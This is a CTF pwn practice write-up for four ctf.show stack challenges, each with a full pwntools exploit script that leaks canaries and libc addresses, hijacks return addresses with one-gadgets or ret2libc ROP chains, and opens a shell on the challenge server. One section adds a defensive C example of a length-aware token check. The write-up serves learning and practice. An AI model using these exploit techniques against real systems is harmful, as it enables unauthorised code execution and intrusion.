PWN-PRACTICE-CTFSHOW-6
- 36D Cup: MengxinStack
- 36D Cup: tang
- 1024 Cup: 1024_happy_stack
- 1024 Cup: 1024_happy_checkin
36D Cup: MengxinStack
The binary has canary and PIE enabled.
Leaking a libc address identifies the remote libc as libc6_2.23-0ubuntu10_amd64.so.
Leak the canary -> overwrite the low byte of the return address to re-enter main -> leak the libc base -> overwrite the return address with a one-gadget.
```python
# -*- coding:utf-8 -*-
# Python 2 pwntools script: str payloads are concatenated with p64() output.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28124)
elf=ELF("./pwn1")

# Leak the remote libc version (used once to identify the libc build)
#io.recvuntil("She said: hello?\n")
#payload="a"*0x40+"b"*8
#io.send(payload)
#io.recvuntil("b"*8)
#__libc_start_main_ret=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
#print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

# Remote libc
libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")

# Leak the canary: the newline from sendline() overwrites the canary's
# low NUL byte, so 0xa is subtracted to restore it
io.recvuntil("She said: hello?\n")
payload="a"*32+"b"*8
io.sendline(payload)
io.recvuntil("b"*8)
canary=u64(io.recv(8))-0xa
print("canary=="+hex(canary))

#.text:00000000000207FA mov rax, fs:2F8h
#.text:0000000000020803 mov [rsp+0B8h+var_48], rax
#.text:0000000000020808 lea rax, [rsp+0B8h+var_98]
#.text:000000000002080D mov fs:300h, rax
#.text:0000000000020816 mov rax, cs:environ_ptr_0
#.text:000000000002081D mov rsi, [rsp+0B8h+var_B0]
#.text:0000000000020822 mov edi, [rsp+0B8h+var_A4]
#.text:0000000000020826 mov rdx, [rax]
#.text:0000000000020829 mov rax, [rsp+0B8h+var_A0]
#.text:000000000002082E call rax
#.text:0000000000020830
#.text:0000000000020830 loc_20830: ; CODE XREF: __libc_start_main+134↓j
#.text:0000000000020830 mov edi, eax
#.text:0000000000020832 call exit

# Overwrite the low byte of the return address so execution re-enters main
payload="a"*40+p64(canary)+"b"*0x18+"\x16"
io.send(payload)

# Leak the libc base
io.recvuntil("She said: hello?\n")
payload="a"*0x40+"b"*8
io.send(payload)
io.recvuntil("b"*8)
__libc_start_main=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-(0x20830-0x20740)
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
ogg=libc_base+0x45216

# Overwrite the return address with the one-gadget
payload="a"*40+p64(canary)+"b"*0x18+p64(ogg)
io.send(payload)
io.interactive()
```
36D Cup: tang
All protections are enabled; the approach is very similar to 36D Cup: MengxinStack.
Leaking a libc address identifies the remote libc as libc6_2.23-0ubuntu10_amd64.so.
Leak the canary -> overwrite the low byte of the return address to re-enter main -> leak the libc base -> overwrite the return address with a one-gadget.
```python
# -*- coding:utf-8 -*-
# Python 2 pwntools script: str payloads are concatenated with p64() output.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28026)
elf=ELF("./pwn1")

# Leak the remote libc version (used once to identify the libc build)
#io.recvuntil("你怎么了?\n")
#io.send("%23$p")
#io.recvuntil("0x")
#__libc_start_main_ret=int(io.recv(12),16)
#print("__libc_start_main_ret=="+hex(__libc_start_main_ret))

# Remote libc
libc=ELF("./libc6_2.23-0ubuntu10_amd64.so")

# Leak the canary through the format string
io.recvuntil("你怎么了?\n")
io.send("%9$p")
io.recvuntil("0x")
canary=int(io.recv(16),16)
print("canary=="+hex(canary))

#.text:00000000000207FA mov rax, fs:2F8h
#.text:0000000000020803 mov [rsp+0B8h+var_48], rax
#.text:0000000000020808 lea rax, [rsp+0B8h+var_98]
#.text:000000000002080D mov fs:300h, rax
#.text:0000000000020816 mov rax, cs:environ_ptr_0
#.text:000000000002081D mov rsi, [rsp+0B8h+var_B0]
#.text:0000000000020822 mov edi, [rsp+0B8h+var_A4]
#.text:0000000000020826 mov rdx, [rax]
#.text:0000000000020829 mov rax, [rsp+0B8h+var_A0]
#.text:000000000002082E call rax
#.text:0000000000020830
#.text:0000000000020830 loc_20830: ; CODE XREF: __libc_start_main+134↓j
#.text:0000000000020830 mov edi, eax
#.text:0000000000020832 call exit

io.recvuntil("燙\n")
io.sendline("P1umH0")

# Overwrite the low byte of the return address so execution re-enters main
io.recvuntil("遠一點!\n")
payload="a"*56+p64(canary)+"b"*0x18+"\x16"
io.send(payload)

# Leak the libc base
io.recvuntil("你怎么了?\n")
io.send("%23$p")
io.recvuntil("0x")
__libc_start_main=int(io.recv(12),16)-(0x20830-0x20740)
libc_base=__libc_start_main-libc.sym["__libc_start_main"]
ogg=libc_base+0xf1147

io.recvuntil("燙\n")
io.sendline("P1umH0")

# Overwrite the return address with the one-gadget
io.recvuntil("遠一點!\n")
payload="a"*56+p64(canary)+"b"*0x18+p64(ogg)
io.send(payload)
io.interactive()
```
1024 Cup: 1024_happy_stack
Stack overflow: bypass the strcmp check with "36D\x00" (strcmp stops at the NUL, so the overflow bytes after it are never compared), then ret2libc.
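The strcmp bypass works because strcmp compares only up to the first NUL byte, while the bytes after it are still written into the buffer. As an added defensive illustration that is not part of the writeup (the challenge's source is not shown, so the expected token, the buffer size and the sample input below are constructed), this C snippet contrasts a NUL-terminated compare with a check that validates the full received length over a bounded read:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical token and buffer capacity; constructed for this illustration,
 * not taken from the challenge binary. */
#define EXPECTED_TOKEN "36D"
#define INPUT_CAP 0x380

/* Constructed sample input: the token, a NUL byte, then trailing bytes that a
 * NUL-terminated compare never examines. */
static const char kConstructedInput[] = "36D\0aaaaaaaa";
#define kConstructedInputLen (sizeof(kConstructedInput) - 1)

/* Weak check: strcmp stops at the first NUL, so "36D\0<anything>" compares
 * equal regardless of what was written after the NUL. */
int weak_token_check(const char *buf)
{
    return strcmp(buf, EXPECTED_TOKEN) == 0;
}

/* Hardened check: the caller supplies the real number of bytes received and
 * the token is accepted only when the whole input (minus an optional trailing
 * newline) is exactly the token. */
int strict_token_check(const char *buf, size_t len)
{
    size_t want = strlen(EXPECTED_TOKEN);
    if (len > 0 && buf[len - 1] == '\n')
        len--;                       /* tolerate a trailing newline only */
    return len == want && memcmp(buf, EXPECTED_TOKEN, want) == 0;
}

/* Bounded reader standing in for a socket read: copies at most cap-1 bytes,
 * always NUL-terminates, and returns the true length so the caller can reason
 * about every byte rather than only those before the first NUL. */
size_t bounded_read(char *dst, size_t cap, const char *src, size_t src_len)
{
    size_t n = src_len < cap - 1 ? src_len : cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Bounded read into a fixed stack buffer followed by the strict check. */
int accept_bounded(const char *src, size_t src_len)
{
    char buf[INPUT_CAP];
    size_t n = bounded_read(buf, sizeof buf, src, src_len);
    return strict_token_check(buf, n);
}

int main(void)
{
    printf("weak check on constructed input:   %d\n",
           weak_token_check(kConstructedInput));
    printf("strict check on constructed input: %d\n",
           strict_token_check(kConstructedInput, kConstructedInputLen));
    printf("bounded+strict on \"36D\\n\":         %d\n",
           accept_bounded("36D\n", 4));
    return 0;
}
```

The weak check accepts the constructed input (1) while the strict check rejects it (0); the combination of a bounded read and a length-aware compare is what removes both the overflow and the NUL-byte shortcut.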
```python
# -*- coding:utf-8 -*-
# Python 2 pwntools script: str payloads are concatenated with p64() output.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28138)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4006AE
pop_rdi=0x400803
ret=0x40028a

# Pass the strcmp check with "36D\x00", overflow, and leak puts via puts@plt
io.recvuntil("qunzhu\n\n")
payload="36D\x00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

# Second round: system("/bin/sh") with a ret gadget for stack alignment
io.recvuntil("qunzhu\n\n")
payload="36D\x00"+"a"*(0x380-4)+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)
io.interactive()
```
1024 Cup: 1024_happy_checkin
Stack overflow, ret2libc.
```python
# -*- coding:utf-8 -*-
# Python 2 pwntools script: str payloads are concatenated with p64() output.
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28173)
elf=ELF("./pwn1")

puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x4005F7
pop_rdi=0x4006e3
ret=0x4004c6

# Leak puts via puts@plt, then return to main
io.recvuntil("ticket\n")
payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

# Second round: system("/bin/sh") with a ret gadget for stack alignment
io.recvuntil("ticket\n")
payload="a"*0x370+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)
io.interactive()
```